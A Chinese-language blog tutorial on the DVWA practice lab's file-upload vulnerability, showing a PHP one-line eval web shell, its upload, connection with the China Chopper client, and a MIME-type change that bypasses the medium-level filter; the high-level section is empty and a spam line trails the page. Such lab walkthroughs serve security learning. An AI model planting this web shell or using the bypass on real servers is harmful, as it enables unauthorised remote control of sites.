大數據中如何進行文件上傳漏洞的分析

蝸牛 互聯網技術資訊 2021-12-10 169 0

今天就跟大家聊聊有關大數據中如何進行文件上傳漏洞的分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

一、環境:dvwa

二、選擇Upload,low級別

1、上傳1.php文件和1.jpg文件都沒問題

PHP文件內容為:

<?php @eval($_POST["abc"]);?>

大數據中如何進行文件上傳漏洞的分析  大數據 第1張

大數據中如何進行文件上傳漏洞的分析  大數據 第2張

2、訪問我們上傳的文件

http://192.168.152.188/dvwa/hackable/uploads/1.jpg

可以看到圖片

http://192.168.152.188/dvwa/hackable/uploads/1.php

什么都看不到

3、用菜刀鏈接1.php文件,點擊添加

大數據中如何進行文件上傳漏洞的分析  大數據 第3張

大數據中如何進行文件上傳漏洞的分析  大數據 第4張

4、雙擊鏈接進入

大數據中如何進行文件上傳漏洞的分析  大數據 第5張

三、選擇Upload,medium級別

1、上傳2.php文件和2.jpg文件,發現不能上傳2.php

2、點擊view source

大數據中如何進行文件上傳漏洞的分析  大數據 第6張

3、這里限制了上傳類型,抓包修改上傳類型

大數據中如何進行文件上傳漏洞的分析  大數據 第7張

4、我們將text/plain修改為image/jpeg,成功上傳

大數據中如何進行文件上傳漏洞的分析  大數據 第8張

5、用菜刀鏈接一下

大數據中如何進行文件上傳漏洞的分析  大數據 第9張

四、選擇Upload,high級別

看完上述內容,你們對大數據中如何進行文件上傳漏洞的分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注蝸牛博客行業資訊頻道,感謝大家的支持。

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:niceseo99@gmail.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

評論

日本韩欧美一级A片在线观看